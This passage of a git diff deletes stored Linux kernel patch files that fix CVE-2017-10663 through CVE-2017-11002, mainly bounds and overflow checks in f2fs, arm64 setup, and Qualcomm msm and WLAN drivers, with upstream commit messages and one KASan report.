- fs/f2fs/super.c | 18 ++++++++++++++++++
- 1 file changed, 18 insertions(+)
-
-diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
-index 77b2cd5ddd569..787d51b7b30d7 100644
---- a/fs/f2fs/super.c
-+++ b/fs/f2fs/super.c
-@@ -450,6 +450,8 @@ static int sanity_check_ckpt(struct f2fs_sb_info *sbi)
- 	unsigned int total, fsmeta;
- 	struct f2fs_super_block *raw_super = F2FS_RAW_SUPER(sbi);
- 	struct f2fs_checkpoint *ckpt = F2FS_CKPT(sbi);
-+	unsigned int main_segs, blocks_per_seg;
-+	int i;
- 
- 	total = le32_to_cpu(raw_super->segment_count);
- 	fsmeta = le32_to_cpu(raw_super->segment_count_ckpt);
-@@ -461,6 +463,22 @@ static int sanity_check_ckpt(struct f2fs_sb_info *sbi)
- 	if (fsmeta >= total)
- 		return 1;
- 
-+	main_segs = le32_to_cpu(sbi->raw_super->segment_count_main);
-+	blocks_per_seg = sbi->blocks_per_seg;
-+
-+	for (i = 0; i < NR_CURSEG_NODE_TYPE; i++) {
-+		if (le32_to_cpu(ckpt->cur_node_segno[i]) >= main_segs ||
-+		    le16_to_cpu(ckpt->cur_node_blkoff[i]) >= blocks_per_seg) {
-+			return 1;
-+		}
-+	}
-+	for (i = 0; i < NR_CURSEG_DATA_TYPE; i++) {
-+		if (le32_to_cpu(ckpt->cur_data_segno[i]) >= main_segs ||
-+		    le16_to_cpu(ckpt->cur_data_blkoff[i]) >= blocks_per_seg) {
-+			return 1;
-+		}
-+	}
-+
- 	if (is_set_ckpt_flags(ckpt, CP_ERROR_FLAG)) {
- 		f2fs_msg(sbi->sb, KERN_ERR, "A bug case: need to run fsck");
- 		return 1;
diff --git a/Patches/Linux_CVEs/CVE-2017-10663/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-10663/3.18/0002.patch
deleted file mode 100644
index f0c46854..00000000
--- a/Patches/Linux_CVEs/CVE-2017-10663/3.18/0002.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From deaeed5b8acdd10c388616bbc57416cf3db213ff Mon Sep 17 00:00:00 2001
-From: Jin Qian <jinqian@google.com>
-Date: Mon, 15 May 2017 10:45:08 -0700
-Subject: f2fs: sanity check checkpoint segno and blkoff
-
-Make sure segno and blkoff read from raw image are valid.
-
-Cc: stable@vger.kernel.org
-Signed-off-by: Jin Qian <jinqian@google.com>
-[Jaegeuk Kim: adjust minor coding style]
-Signed-off-by: Jaegeuk Kim <jaegeuk@kernel.org>
----
- fs/f2fs/super.c | 16 ++++++++++++++++
- 1 file changed, 16 insertions(+)
-
-diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
-index 375dfab..e04be72 100644
---- a/fs/f2fs/super.c
-+++ b/fs/f2fs/super.c
-@@ -1509,6 +1509,8 @@ int sanity_check_ckpt(struct f2fs_sb_info *sbi)
- 	struct f2fs_super_block *raw_super = F2FS_RAW_SUPER(sbi);
- 	struct f2fs_checkpoint *ckpt = F2FS_CKPT(sbi);
- 	unsigned int ovp_segments, reserved_segments;
-+	unsigned int main_segs, blocks_per_seg;
-+	int i;
- 
- 	total = le32_to_cpu(raw_super->segment_count);
- 	fsmeta = le32_to_cpu(raw_super->segment_count_ckpt);
-@@ -1530,6 +1532,20 @@ int sanity_check_ckpt(struct f2fs_sb_info *sbi)
- 		return 1;
- 	}
- 
-+	main_segs = le32_to_cpu(raw_super->segment_count_main);
-+	blocks_per_seg = sbi->blocks_per_seg;
-+
-+	for (i = 0; i < NR_CURSEG_NODE_TYPE; i++) {
-+		if (le32_to_cpu(ckpt->cur_node_segno[i]) >= main_segs ||
-+			le16_to_cpu(ckpt->cur_node_blkoff[i]) >= blocks_per_seg)
-+			return 1;
-+	}
-+	for (i = 0; i < NR_CURSEG_DATA_TYPE; i++) {
-+		if (le32_to_cpu(ckpt->cur_data_segno[i]) >= main_segs ||
-+			le16_to_cpu(ckpt->cur_data_blkoff[i]) >= blocks_per_seg)
-+			return 1;
-+	}
-+
- 	if (unlikely(f2fs_cp_error(sbi))) {
- 		f2fs_msg(sbi->sb, KERN_ERR, "A bug case: need to run fsck");
- 		return 1;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-10996/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-10996/ANY/0001.patch
deleted file mode 100644
index 52763a1b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-10996/ANY/0001.patch
+++ /dev/null
@@ -1,63 +0,0 @@
-From 9f261e5dfe101bbe35043822a89bffa78e080b3b Mon Sep 17 00:00:00 2001
-From: "Se Wang (Patrick) Oh" <sewango@codeaurora.org>
-Date: Wed, 2 Sep 2015 21:07:47 -0700
-Subject: arm64: Fix out of bound access to compat_hwcap_str
-
-As compat_hwcap_str[] doesn't end with 'NULL', c_show()
-tries to read the next element even after the end of the
-array. So add 'NULL' at the end of compat_hwcap_str[].
-Below is the KASan report for referencing.
-
-BUG: KASan: out of bounds access in c_show+0x110/0x248 at addr ffffffc0011f6370
-Read of size 8 by task pool-1-thread-1/10526
-page:ffffffbac14b39c0 count:1 mapcount:0 mapping:          (null) index:0x0
-flags: 0x400(reserved)
-page dumped because: kasan: bad access detected
-Address belongs to variable compat_hwcap_str+0xb0/0xe0
-CPU: 0 PID: 10526 Comm: pool-1-thread-1 Tainted: G    B   W      3.18.18-ga7b28e9-11552-ge4a827f #1
-Hardware name: Qualcomm Technologies, Inc. MSM 8996 v2 + PMI8994 MTP (DT)
-Call trace:
-[<ffffffc000089ec4>] dump_backtrace+0x0/0x1c4
-[<ffffffc00008a098>] show_stack+0x10/0x1c
-[<ffffffc0011a7c58>] dump_stack+0x74/0xc8
-[<ffffffc00020e94c>] kasan_report_error+0x2b0/0x408
-[<ffffffc00020eb80>] kasan_report+0x34/0x40
-[<ffffffc00020db14>] __asan_load8+0x84/0x90
-[<ffffffc000088ae8>] c_show+0x10c/0x248
-[<ffffffc000245bb8>] traverse+0x1a8/0x320
-[<ffffffc000245dc8>] seq_lseek+0x98/0x148
-[<ffffffc00028f4e0>] proc_reg_llseek+0xa0/0xd8
-[<ffffffc000217d1c>] vfs_llseek+0x5c/0x70
-[<ffffffc000218b0c>] SyS_lseek+0x48/0x80
-[<ffffffc000218b50>] compat_SyS_lseek+0xc/0x18
-Memory state around the buggy address:
- ffffffc0011f6200: 00 00 fa fa fa fa fa fa 00 03 fa fa fa fa fa fa
- ffffffc0011f6280: 04 fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
->ffffffc0011f6300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa
-                                                             ^
- ffffffc0011f6380: fa fa fa fa 00 00 00 00 00 00 fa fa fa fa fa fa
- ffffffc0011f6400: 02 fa fa fa fa fa fa fa 00 00 00 02 fa fa fa fa
-
-Change-Id: I5e2098f9a7a676c47a01baf10de3ac1c86265e69
-Signed-off-by: Se Wang (Patrick) Oh <sewango@codeaurora.org>
----
- arch/arm64/kernel/setup.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/arch/arm64/kernel/setup.c b/arch/arm64/kernel/setup.c
-index 58e7c14..1da40ef 100644
---- a/arch/arm64/kernel/setup.c
-+++ b/arch/arm64/kernel/setup.c
-@@ -488,7 +488,8 @@ static const char *compat_hwcap_str[] = {
- 	"idivt",
- 	"vfpd32",
- 	"lpae",
--	"evtstrm"
-+	"evtstrm",
-+	NULL
- };
- 
- static const char *compat_hwcap2_str[] = {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-10997/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-10997/3.10/0001.patch
deleted file mode 100644
index 2fcd6a1d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-10997/3.10/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From fae242db5e1943ba878b4fb215fe6e7f1c387a20 Mon Sep 17 00:00:00 2001
-From: Tony Truong <truong@codeaurora.org>
-Date: Fri, 6 Jan 2017 14:03:03 -0800
-Subject: msm: pcie: add bounds check for debugfs register write
-
-Via debugfs nodes, users have the option to read and write to
-any PCIe register. To ensure clients do not access registers
-outside the PCIe range, add checks to validate the offset clients
-provide.
-
-Bug: 33039685
-Change-Id: Ia35cd04c57f01c21a47962be596bca395b5ca247
-Signed-off-by: Tony Truong <truong@codeaurora.org>
----
- drivers/pci/host/pci-msm.c | 13 ++++++++++---
- 1 file changed, 10 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/pci/host/pci-msm.c b/drivers/pci/host/pci-msm.c
-index 1b80fa1..ffaa059 100644
---- a/drivers/pci/host/pci-msm.c
-+++ b/drivers/pci/host/pci-msm.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -1691,8 +1691,15 @@ static void msm_pcie_sel_debug_testcase(struct msm_pcie_dev_t *dev,
- 			dev->res[base_sel - 1].base,
- 			wr_offset, wr_mask, wr_value);
- 
--		msm_pcie_write_reg_field(dev->res[base_sel - 1].base,
--			wr_offset, wr_mask, wr_value);
-+		base_sel_size = resource_size(dev->res[base_sel - 1].resource);
-+
-+		if (wr_offset >  base_sel_size - 4 ||
-+			msm_pcie_check_align(dev, wr_offset))
-+			pr_alert("PCIe: RC%d: Invalid wr_offset: 0x%x. wr_offset should be no more than 0x%x\n",
-+				dev->rc_idx, wr_offset, base_sel_size - 4);
-+		else
-+			msm_pcie_write_reg_field(dev->res[base_sel - 1].base,
-+				wr_offset, wr_mask, wr_value);
- 
- 		break;
- 	case 13: /* dump all registers of base_sel */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-10997/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-10997/4.4/0002.patch
deleted file mode 100644
index 6434aa06..00000000
--- a/Patches/Linux_CVEs/CVE-2017-10997/4.4/0002.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From a395a070880acc679e3832b21d96504edbbe4af2 Mon Sep 17 00:00:00 2001
-From: Tony Truong <truong@codeaurora.org>
-Date: Fri, 6 Jan 2017 14:03:03 -0800
-Subject: msm: pcie: add bounds check for debugfs register write
-
-Via debugfs nodes, users have the option to read and write to
-any PCIe register. To ensure clients do not access registers
-outside the PCIe range, add checks to validate the offset clients
-provide.
-
-Change-Id: Ia35cd04c57f01c21a47962be596bca395b5ca247
-Signed-off-by: Tony Truong <truong@codeaurora.org>
----
- drivers/pci/host/pci-msm.c | 14 +++++++++++---
- 1 file changed, 11 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/pci/host/pci-msm.c b/drivers/pci/host/pci-msm.c
-index 7c8b5e3..cd105a0 100644
---- a/drivers/pci/host/pci-msm.c
-+++ b/drivers/pci/host/pci-msm.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -2414,8 +2414,16 @@ static void msm_pcie_sel_debug_testcase(struct msm_pcie_dev_t *dev,
- 			dev->res[base_sel - 1].base,
- 			wr_offset, wr_mask, wr_value);
- 
--		msm_pcie_write_reg_field(dev->res[base_sel - 1].base,
--			wr_offset, wr_mask, wr_value);
-+		base_sel_size = resource_size(dev->res[base_sel - 1].resource);
-+
-+		if (wr_offset >  base_sel_size - 4 ||
-+			msm_pcie_check_align(dev, wr_offset))
-+			PCIE_DBG_FS(dev,
-+				"PCIe: RC%d: Invalid wr_offset: 0x%x. wr_offset should be no more than 0x%x\n",
-+				dev->rc_idx, wr_offset, base_sel_size - 4);
-+		else
-+			msm_pcie_write_reg_field(dev->res[base_sel - 1].base,
-+				wr_offset, wr_mask, wr_value);
- 
- 		break;
- 	case 13: /* dump all registers of base_sel */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-10998/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-10998/3.10/0001.patch
deleted file mode 100644
index 8429a974..00000000
--- a/Patches/Linux_CVEs/CVE-2017-10998/3.10/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 9ffb3cdd7279b011a509267caa4a5119fd6346c0 Mon Sep 17 00:00:00 2001
-From: Siena Richard <sienar@codeaurora.org>
-Date: Wed, 11 Jan 2017 11:09:24 -0800
-Subject: ASoC: msm: qdsp6v2: extend validation of virtual address
-
-Validate a buffer virtual address is fully within the region before
-returning the region to ensure functionality for an extended edge case.
-
-Change-Id: Iba3e080889980f393d6a9f0afe0231408b92d654
-Signed-off-by: Siena Richard <sienar@codeaurora.org>
-CRs-fixed: 1108461
-
-Bug: 38195131
-Change-Id: Ib527a380a857719bff8254be514133528bd64c75
----
- drivers/misc/qcom/qdsp6v2/audio_utils_aio.c | 7 +++++--
- 1 file changed, 5 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-index 07de5a2..42a3ea7 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-@@ -1,6 +1,6 @@
- /* Copyright (C) 2008 Google, Inc.
-  * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2009-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2009-2017, The Linux Foundation. All rights reserved.
-  *
-  * This software is licensed under the terms of the GNU General Public
-  * License version 2, as published by the Free Software Foundation, and
-@@ -119,7 +119,10 @@ static int audio_aio_ion_lookup_vaddr(struct q6audio_aio *audio, void *addr,
- 	list_for_each_entry(region_elt, &audio->ion_region_queue, list) {
- 		if (addr >= region_elt->vaddr &&
- 			addr < region_elt->vaddr + region_elt->len &&
--			addr + len <= region_elt->vaddr + region_elt->len) {
-+			addr + len <= region_elt->vaddr + region_elt->len &&
-+			addr + len > addr) {
-+			/* to avoid integer addition overflow */
-+
- 			/* offset since we could pass vaddr inside a registerd
- 			* ion buffer
- 			*/
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-10998/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-10998/3.18/0002.patch
deleted file mode 100644
index 9d70672c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-10998/3.18/0002.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From 208e72e59c8411e75d4118b48648a5b7d42b1682 Mon Sep 17 00:00:00 2001
-From: Siena Richard <sienar@codeaurora.org>
-Date: Wed, 11 Jan 2017 11:09:24 -0800
-Subject: ASoC: msm: qdsp6v2: extend validation of virtual address
-
-Validate a buffer virtual address is fully within the region before
-returning the region to ensure functionality for an extended edge
-case.
-
-Change-Id: Iba3e080889980f393d6a9f0afe0231408b92d654
-Signed-off-by: Siena Richard <sienar@codeaurora.org>
-CRs-fixed: 1108461
----
- drivers/misc/qcom/qdsp6v2/audio_utils_aio.c | 7 +++++--
- 1 file changed, 5 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-index 9ade557..c12f791 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-@@ -1,6 +1,6 @@
- /* Copyright (C) 2008 Google, Inc.
-  * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2009-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2009-2017, The Linux Foundation. All rights reserved.
-  *
-  * This software is licensed under the terms of the GNU General Public
-  * License version 2, as published by the Free Software Foundation, and
-@@ -119,7 +119,10 @@ static int audio_aio_ion_lookup_vaddr(struct q6audio_aio *audio, void *addr,
- 	list_for_each_entry(region_elt, &audio->ion_region_queue, list) {
- 		if (addr >= region_elt->vaddr &&
- 			addr < region_elt->vaddr + region_elt->len &&
--			addr + len <= region_elt->vaddr + region_elt->len) {
-+			addr + len <= region_elt->vaddr + region_elt->len &&
-+			addr + len > addr) {
-+			/* to avoid integer addition overflow */
-+
- 			/* offset since we could pass vaddr inside a registerd
- 			* ion buffer
- 			*/
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-10999/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-10999/ANY/0001.patch
deleted file mode 100644
index 8075517a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-10999/ANY/0001.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From f51a152ad52108457ae6b1caf7a04857f25c4bed Mon Sep 17 00:00:00 2001
-From: Skylar Chang <chiaweic@codeaurora.org>
-Date: Wed, 15 Mar 2017 21:27:35 -0700
-Subject: msm: ipa: fix security issues in ipa wan driver
-
-Fix the security issue in handling add mux channel event
-in ipa wan driver.
-
-Bug: 36490777
-Change-Id: Ic2ffeafddad4954ec3ecba0d675646d0790eede7
-Signed-off-by: Skylar Chang <chiaweic@codeaurora.org>
-Acked-by: Shihuan Liu <shihuanl@qti.qualcomm.com>
----
- drivers/platform/msm/ipa/rmnet_ipa.c | 8 +++++++-
- 1 file changed, 7 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/platform/msm/ipa/rmnet_ipa.c b/drivers/platform/msm/ipa/rmnet_ipa.c
-index a149a9e..0d6fb33 100644
---- a/drivers/platform/msm/ipa/rmnet_ipa.c
-+++ b/drivers/platform/msm/ipa/rmnet_ipa.c
-@@ -57,6 +57,7 @@ static atomic_t is_initialized;
- static atomic_t is_ssr;
- 
- u32 apps_to_ipa_hdl, ipa_to_apps_hdl; /* get handler from ipa */
-+static struct mutex add_mux_channel_lock;
- static int wwan_add_ul_flt_rule_to_ipa(void);
- static int wwan_del_ul_flt_rule_to_ipa(void);
- 
-@@ -1242,9 +1243,11 @@ static int ipa_wwan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd)
- 					rmnet_mux_val.mux_id);
- 				return rc;
- 			}
-+			mutex_lock(&add_mux_channel_lock);
- 			if (rmnet_index >= MAX_NUM_OF_MUX_CHANNEL) {
- 				IPAWANERR("Exceed mux_channel limit(%d)\n",
- 				rmnet_index);
-+				mutex_unlock(&add_mux_channel_lock);
- 				return -EFAULT;
- 			}
- 			IPAWANDBG("ADD_MUX_CHANNEL(%d, name: %s)\n",
-@@ -1270,6 +1273,7 @@ static int ipa_wwan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd)
- 					IPAWANERR("device %s reg IPA failed\n",
- 						extend_ioctl_data.u.
- 						rmnet_mux_val.vchannel_name);
-+					mutex_unlock(&add_mux_channel_lock);
- 					return -ENODEV;
- 				}
- 				mux_channel[rmnet_index].mux_channel_set = true;
-@@ -1282,6 +1286,7 @@ static int ipa_wwan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd)
- 				mux_channel[rmnet_index].ul_flt_reg = false;
- 			}
- 			rmnet_index++;
-+			mutex_unlock(&add_mux_channel_lock);
- 			break;
- 		case RMNET_IOCTL_SET_EGRESS_DATA_FORMAT:
- 			IPAWANDBG("get RMNET_IOCTL_SET_EGRESS_DATA_FORMAT\n");
-@@ -2050,7 +2055,7 @@ static int __init ipa_wwan_init(void)
- 
- 	atomic_set(&is_initialized, 0);
- 	atomic_set(&is_ssr, 0);
--
-+	mutex_init(&add_mux_channel_lock);
- 	/* Register for Modem SSR */
- 	subsys = subsys_notif_register_notifier(SUBSYS_MODEM, &ssr_notifier);
- 	if (!IS_ERR(subsys))
-@@ -2061,6 +2066,7 @@ static int __init ipa_wwan_init(void)
- 
- static void __exit ipa_wwan_cleanup(void)
- {
-+	mutex_destroy(&add_mux_channel_lock);
- 	platform_driver_unregister(&rmnet_ipa_driver);
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11000/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11000/ANY/0001.patch
deleted file mode 100644
index 63c8233a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11000/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From af787fdedeb62964efaf9e969ad17e3b6c232082 Mon Sep 17 00:00:00 2001
-From: Gaoxiang Chen <gaochen@codeaurora.org>
-Date: Wed, 17 May 2017 15:14:36 +0800
-Subject: msm: camera: fix off-by-one overflow in msm_isp_get_bufq
-
-In msm_isp_get_bufq, if bufq_index equals buf_mgr->num_buf_q,
-it will pass the check, leading to off-by-one overflow
-(exceed the length of array by one element).
-
-CRs-Fixed: 2031677
-Bug: 36136563
-Change-Id: I7ea465897e2c37de6ca0155c3e225f1444b3cf13
-Signed-off-by: Gaoxiang Chen <gaochen@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c b/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c
-index ee65528..433d59c 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c
-@@ -46,7 +46,7 @@ struct msm_isp_bufq *msm_isp_get_bufq(
- 
- 	/* bufq_handle cannot be 0 */
- 	if ((bufq_handle == 0) ||
--		(bufq_index > buf_mgr->num_buf_q))
-+		(bufq_index >= buf_mgr->num_buf_q))
- 		return NULL;
- 
- 	bufq = &buf_mgr->bufq[bufq_index];
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11001/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11001/ANY/0001.patch
deleted file mode 100644
index f1499616..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11001/ANY/0001.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From d5d2c9baff89932e822ceae74b1569af07d55f19 Mon Sep 17 00:00:00 2001
-From: Srinivas Girigowda <sgirigow@codeaurora.org>
-Date: Fri, 7 Jul 2017 11:58:04 -0700
-Subject: qcacld-2.0: Fix out of bound read issue in get link properties
-
-Length of the MAC address is not checked which may cause out of bound
-read issue.
-
-To resolve this add a check for MAC address length.
-
-CRs-Fixed: 2051433
-Change-Id: I58454b84c28b157cef35984d612a9bc6fdd9ec56
-Bug: 36815555
-Signed-off-by: Srinivas Girigowda <sgirigow@codeaurora.org>
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_cfg80211.c | 10 +++++++++-
- 1 file changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_cfg80211.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_cfg80211.c
-index c153928..6d99f2d 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -8481,7 +8481,8 @@ static int __wlan_hdd_cfg80211_wifi_logger_start(struct wiphy *wiphy,
- static const struct
- nla_policy
- qca_wlan_vendor_attr_policy[QCA_WLAN_VENDOR_ATTR_MAX+1] = {
--	[QCA_WLAN_VENDOR_ATTR_MAC_ADDR] = { .type = NLA_UNSPEC },
-+	[QCA_WLAN_VENDOR_ATTR_MAC_ADDR] = {
-+		.type = NLA_BINARY, .len = VOS_MAC_ADDR_SIZE },
- };
- 
- /**
-@@ -8536,6 +8537,13 @@ static int __wlan_hdd_cfg80211_get_link_properties(struct wiphy *wiphy,
- 		return -EINVAL;
- 	}
- 
-+	if (nla_len(tb[QCA_WLAN_VENDOR_ATTR_MAC_ADDR]) < sizeof(peer_mac)) {
-+		hddLog(VOS_TRACE_LEVEL_ERROR,
-+			FL("Attribute peerMac is invalid=%d"),
-+			adapter->device_mode);
-+		return -EINVAL;
-+	}
-+
- 	memcpy(peer_mac, nla_data(tb[QCA_WLAN_VENDOR_ATTR_MAC_ADDR]),
- 	       sizeof(peer_mac));
- 	hddLog(VOS_TRACE_LEVEL_INFO,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11002/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-11002/ANY/0002.patch
deleted file mode 100644
index 658443df..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11002/ANY/0002.patch
+++ /dev/null
@@ -1,88 +0,0 @@
-From 825eeb85d4866e362452b18df929a54a7c6111f6 Mon Sep 17 00:00:00 2001
-From: Srinivas Girigowda <sgirigow@codeaurora.org>
-Date: Mon, 10 Jul 2017 11:50:46 -0700
-Subject: qcacld-2.0: Avoid concurrent matrix max param overread
-
-qcacld-3.0 to qcacld-2.0 propagation
-
-Currently there is no nl policy defined for vendor sub command
-QCA_NL80211_VENDOR_SUBCMD_GET_CONCURRENCY_MATRIX which may result in
-buffer overread error.
-
-To resolve this, add nl policy.
-
-Change-Id: I155efdbb07f1c5fe300bb2be0c2a3fe07c7e134b
-CRs-Fixed: 2058452
-Bug: 37712167
-Signed-off-by: Srinivas Girigowda <sgirigow@codeaurora.org>
----
- .../qcacld-2.0/CORE/HDD/src/wlan_hdd_cfg80211.c    | 24 ++++++++++++++++------
- 1 file changed, 18 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_cfg80211.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 6d99f2d..13956f9 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -1666,6 +1666,15 @@ wlan_hdd_cfg80211_set_scanning_mac_oui(struct wiphy *wiphy,
- 	return ret;
- }
- 
-+#define MAX_CONCURRENT_MATRIX \
-+	QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_MAX
-+#define MATRIX_CONFIG_PARAM_SET_SIZE_MAX \
-+	QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_CONFIG_PARAM_SET_SIZE_MAX
-+static const struct nla_policy
-+wlan_hdd_get_concurrency_matrix_policy[MAX_CONCURRENT_MATRIX + 1] = {
-+	[MATRIX_CONFIG_PARAM_SET_SIZE_MAX] = {.type = NLA_U32},
-+};
-+
- static int
- __wlan_hdd_cfg80211_get_concurrency_matrix(struct wiphy *wiphy,
-                                          struct wireless_dev *wdev,
-@@ -1674,7 +1683,7 @@ __wlan_hdd_cfg80211_get_concurrency_matrix(struct wiphy *wiphy,
- {
-     uint32_t feature_set_matrix[WLAN_HDD_MAX_FEATURE_SET] = {0};
-     uint8_t i, feature_sets, max_feature_sets;
--    struct nlattr *tb[QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_MAX + 1];
-+    struct nlattr *tb[MAX_CONCURRENT_MATRIX + 1];
-     struct sk_buff *reply_skb;
-     hdd_context_t *hdd_ctx = wiphy_priv(wiphy);
-     int ret;
-@@ -1690,19 +1699,19 @@ __wlan_hdd_cfg80211_get_concurrency_matrix(struct wiphy *wiphy,
-     if (0 != ret)
-         return ret;
- 
--    if (nla_parse(tb, QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_MAX,
--                  data, data_len, NULL)) {
-+    if (nla_parse(tb, MAX_CONCURRENT_MATRIX,
-+                  data, data_len, wlan_hdd_get_concurrency_matrix_policy)) {
-         hddLog(LOGE, FL("Invalid ATTR"));
-         return -EINVAL;
-     }
- 
-     /* Parse and fetch max feature set */
--    if (!tb[QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_CONFIG_PARAM_SET_SIZE_MAX]) {
-+    if (!tb[MATRIX_CONFIG_PARAM_SET_SIZE_MAX]) {
-         hddLog(LOGE, FL("Attr max feature set size failed"));
-         return -EINVAL;
-     }
--    max_feature_sets = nla_get_u32(
--     tb[QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_CONFIG_PARAM_SET_SIZE_MAX]);
-+
-+    max_feature_sets = nla_get_u32(tb[MATRIX_CONFIG_PARAM_SET_SIZE_MAX]);
-     hddLog(LOG1, FL("Max feature set size: %d"), max_feature_sets);
- 
-     /* Fill feature combination matrix */
-@@ -1744,6 +1753,9 @@ __wlan_hdd_cfg80211_get_concurrency_matrix(struct wiphy *wiphy,
-     return -ENOMEM;
- }
- 
-+#undef MAX_CONCURRENT_MATRIX
-+#undef MATRIX_CONFIG_PARAM_SET_SIZE_MAX
-+
- /**
-  * wlan_hdd_cfg80211_get_concurrency_matrix() - get concurrency matrix
-  * @wiphy:   pointer to wireless wiphy structure.
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11002/prima/0001.patch b/Patches/Linux_CVEs/CVE-2017-11002/prima/0001.patch
deleted file mode 100644
index eaa262c5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11002/prima/0001.patch
+++ /dev/null
@@ -1,85 +0,0 @@
-From 64c0865bb0c5a642ba420967b23e0f66e035b300 Mon Sep 17 00:00:00 2001
-From: Rajeev Kumar Sirasanagandla <rsirasan@codeaurora.org>
-Date: Tue, 13 Jun 2017 12:04:09 +0530
-Subject: wlan: Avoid concurrent matrix max param overread
-
-qcacld-3.0 to prima propagation.
-
-Currently there is no nl policy defined for vendor sub command
